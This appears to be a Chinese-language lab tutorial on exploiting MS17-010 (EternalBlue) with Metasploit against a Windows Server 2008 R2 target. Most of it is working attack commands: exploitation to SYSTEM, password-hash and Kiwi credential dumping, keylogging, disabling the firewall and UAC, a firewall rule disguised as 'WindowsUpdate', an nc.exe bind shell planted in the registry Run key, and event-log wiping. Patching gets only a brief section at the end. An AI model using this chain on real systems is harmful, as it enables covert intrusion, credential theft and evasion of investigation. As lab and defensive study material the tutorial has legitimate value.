摘要永恒之蓝MS17-010是2017年WannaCry勒索病毒的罪魁祸首利用SMBv1协议漏洞可远程获取Windows系统最高权限。本文将基于Kali Linux 2026.1与Windows Server 2008 R2靶机使用Metasploit完整演示漏洞扫描、永恒之蓝攻击获取Meterpreter Shell、后渗透阶段的hash抓取、Kiwi明文密码提取、进程迁移、键盘记录、关闭UAC、利用注册表植入NC后门实现开机自启持久化控制、防火墙策略调整以及最终通过安装官方补丁彻底免疫。同时深入解析NetcatNC的诞生故事与核心功能。全文旨在帮助读者理解完整攻击链路、持久化技巧与防御要点。一、实验环境说明设备角色操作系统 / 版本IP地址攻击机Kali Linux 2026.1MSFconsole 6.x10.0.0.129/24靶机Windows Server 2008 R264位10.0.0.152/24网络要求攻击机与靶机同一网段能互相ping通靶机445端口可访问。注意靶机必须开启SMBv1协议Windows Server 2008 R2默认开启且未打KB4013389等补丁。二、Netcat简介网络工具中的瑞士军刀Netcat简称nc被誉为“网络工具中的瑞士军刀”由Hobbit于1995年首次发布。它体积小巧几十KB但功能极其强大可以在两台设备之间建立TCP/UDP连接实现数据交互。核心功能侦听模式在一台设备上开启端口监听等待连接。传输模式从一台设备主动连接到另一台设备的监听端口。端口扫描探测目标开放端口。文件传输通过重定向发送/接收文件。后门通道将命令行绑定到某个端口远程执行系统命令。为什么它适合做后门攻击者获得系统权限后可以将nc.exe上传到受害者主机并配置为开机自启。之后任何时刻攻击者只需nc 目标IP 端口就能获得一个远程命令行且不会在目标上留下明显的恶意进程名称。在本次实验中我们将利用nc在Windows靶机上建立一个开机自启的后门实现持久化控制。三、漏洞传奇从NSA武器库到全球勒索风暴漏洞编号MS17-010包含CVE-2017-0143 ~ CVE-2017-0148影响组件Windows SMBv1 协议理论危害等级严重远程代码执行无需认证故事时间线2017年3月黑客组织Shadow Brokers泄露了NSA美国国家安全局的一批黑客工具其中包括“永恒之蓝”EternalBlue。2017年4月微软紧急发布安全更新MS17-010补丁KB4013389等但大量用户未及时安装。2017年5月12日WannaCry勒索病毒爆发利用永恒之蓝漏洞在短短几天内感染全球150多个国家30万台电脑造成数十亿美元损失。2017年5月13日一名安全研究员注册了病毒代码中的kill‑switch域名意外阻止了传播但变种仍层出不穷。漏洞原理简版SMBv1在处理特定类型的数据包时存在多个缓冲区溢出漏洞。攻击者可发送精心构造的SMB消息触发内核态代码执行从而获得SYSTEM权限。影响系统未打补丁Windows Vista / 7 / 8 / 8.1Windows Server 2008 / 2008 R2 / 2012 / 2012 R2Windows 10 早期版本已修复四、攻击阶段从扫描到获得Meterpreter Shell步骤1启动MSF并搜索永恒之蓝模块msfconsole -q msf search ms17-010关键模块auxiliary/scanner/smb/smb_ms17_010—— 扫描检测模块exploit/windows/smb/ms17_010_eternalblue—— 攻击利用模块auxiliary/admin/smb/ms17_010_command—— 命令执行辅助模块步骤2扫描确认漏洞存在msf use auxiliary/scanner/smb/smb_ms17_010 msf set RHOSTS 10.0.0.152 msf run输出应包括[] 10.0.0.152:445 - Host is likely VULNERABLE to MS17-010!步骤3发起攻击获取Meterpretermsf back msf use exploit/windows/smb/ms17_010_eternalblue msf set RHOSTS 10.0.0.152 msf run成功后会进入验证权限meterpreter getuid # 获取用户信息五、后渗透阶段占领军全面控制5.1 基础信息收集meterpreter sysinfo meterpreter ipconfig meterpreter shell C:\Windows\system32chcp 65001 chcp 65001 Active code page: 65001 C:\Windows\system32 whoami nt authority\system C:\Windows\system32 exit5.2 抓取密码哈希hashdumpmeterpreter hashdump得到的NTLM哈希可尝试在线MD5解密网站如cmd5.com破解。尝试通过破解的密码进行远程连接5.3 使用Kiwi模块抓取明文密码Kiwi是Mimikatz的MSF集成版可从内存中提取明文密码。meterpreter load kiwi meterpreter help kiwi meterpreter creds_all如果靶机上有登录过的账户可能直接输出明文密码。5.4 进程迁移提高稳定性默认Meterpreter进程可能不稳定迁移到合法进程如explorer.exemeterpreter ps -S explore # 找到explorer.exe的PID meterpreter migrate 1234 # 替换为目标PID meterpreter getuid5.5 键盘记录meterpreter run post/windows/capture/keylog_recorder然后在Windows靶机上打开记事本随意输入一些文字。另打开一个Kali终端查看记录cat /root/.msf4/loot/20260509205936_default_10.0.0.152_host.windows.key_221376.txt5.6 关闭防火墙或添加后门规则方法一粗暴关闭防火墙meterpreter shell C:\Windows\system32chcp 65001 C:\Windows\system32 netsh advfirewall set allprofiles state on #开启防火墙 C:\Windows\system32 netsh advfirewall set allprofiles state off #关闭防火墙方法二添加隐蔽入站规则推荐C:\Windows\system32 netsh advfirewall firewall add rule nameWindowsUpdate dirin actionallow protocoltcp localport4444然后在Windows靶机上打开“高级安全Windows防火墙”查看入站规则可以看到名为“WindowsUpdate”的规则。5.7 关闭UAC用户账户控制UAC会弹窗提醒权限提升操作关闭后可使后门更隐蔽。查看靶机当前UAC级别默认是关闭的运行输入msconfig先打开操作注册表关闭UACreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5.8 利用注册表添加NC后门持久化控制第一步上传nc.exe到靶机Kali默认自带nc.exe路径为/usr/share/windows-binaries/nc.exe。在Meterpreter中上传meterpreter upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32\\验证上传成功meterpreter ls C:\\windows\\system32\\nc.exe第二步利用注册表添加开机自启后门设置注册表键值使系统每次启动时自动运行nc.exe监听4444端口并将cmd.exe绑定到该端口。meterpreter reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d C:\\windows\\system32\\nc.exe -Ldp 4444 -e cmd.exe参数解释-L持续监听即使连接断开仍继续等待Windows版特有。-d后台运行不弹出窗口。-p 4444监听端口4444。-e cmd.exe连接后执行cmd.exe给予攻击者Shell。第三步查询注册表键值是否添加成功meterpreter reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run输出中应包含新创建的项nc。查询详细内容meterpreter reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc应显示Key: HKLM\software\microsoft\windows\currentversion\RunName: ncType: REG_SZData: C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe第四步远程启动后门或等待靶机重启无需重启立即手动启动后门meterpreter shell C:\Windows\system32 nc.exe -Ldp 4444 -e cmd.exe此时nc开始在后台监听4444端口。若靶机防火墙开启需放行4444端口或暂时关闭防火墙可参考5.6第五步攻击机连接后门在Kali新终端中保持MSF会话存在或退出nc 10.0.0.152 4444连接成功后你将获得靶机的cmd命令行至此即使MSF的Meterpreter会话断开只要靶机重启或nc进程存活攻击者仍可通过nc 10.0.0.152 4444随时获得命令行实现持久化后门。5.9 清空事件日志擦除痕迹meterpreter clearev此命令清除应用程序、系统和安全日志。再去靶机的“事件查看器” → “Windows日志” → “安全”中查看会发现日志已被清空。六、防御阶段安装补丁封神补丁信息安全公告MS17-010对应KB编号Windows Server 2008 R2KB4012215下载地址https://catalog.update.microsoft.com/Search.aspx?qKB4012215安装与验证下载补丁并拷贝到靶机运行安装程序完成后重启此补丁需要在安装了SP1补丁的前提下安装可参考上篇文章再次使用MSF扫描模块msf use auxiliary/scanner/smb/smb_ms17_010 msf set RHOSTS 10.0.0.152 msf run输出变为[] Host does NOT appear vulnerable。攻击模块无法再获取Shell。结论安装补丁后永恒之蓝漏洞被彻底封堵。七、总结本文针对MS17-010永恒之蓝SMBv1远程代码执行漏洞在Kali Linux 2026.1攻击机10.0.0.129与未打补丁的Windows Server 2008 R2靶机10.0.0.152环境中完整复现了从漏洞扫描、攻击利用到后渗透控制及持久化后门植入的全过程。实验首先使用Metasploit扫描模块确认目标脆弱随后通过永恒之蓝攻击模块成功获取SYSTEM权限的Meterpreter会话。在后渗透阶段依次执行了哈希抓取、Kiwi模块提取明文密码、进程迁移、键盘记录、关闭UAC等操作并重点演示了利用NetcatNC上传后门程序、通过注册表添加开机自启项、实现持久化远程命令行访问的技术细节最后使用clearev命令清除系统日志以掩盖痕迹。同时本文介绍了Netcat作为“网络瑞士军刀”的诞生背景与核心功能。实验最后通过安装微软官方安全更新KB4013389彻底修复漏洞验证了补丁的有效性。结果表明永恒之蓝漏洞利用方式成熟、危害极大且攻击者可结合注册表持久化技术长期控制目标防御方必须及时安装补丁并定期检查注册表启动项及异常进程。重要声明本教程及文中所有操作仅限于合法授权的安全学习与研究。作者及发布平台不承担因不当使用本教程所引发的任何直接或间接法律责任。请务必遵守中华人民共和国网络安全相关法律法规。如果这篇文章帮你解决了实操上的困惑别忘记点击点赞、分享也可以留言告诉我你遇到的其它问题我会尽快回复。你的关注是我坚持原创和细节共享的力量来源谢谢大家。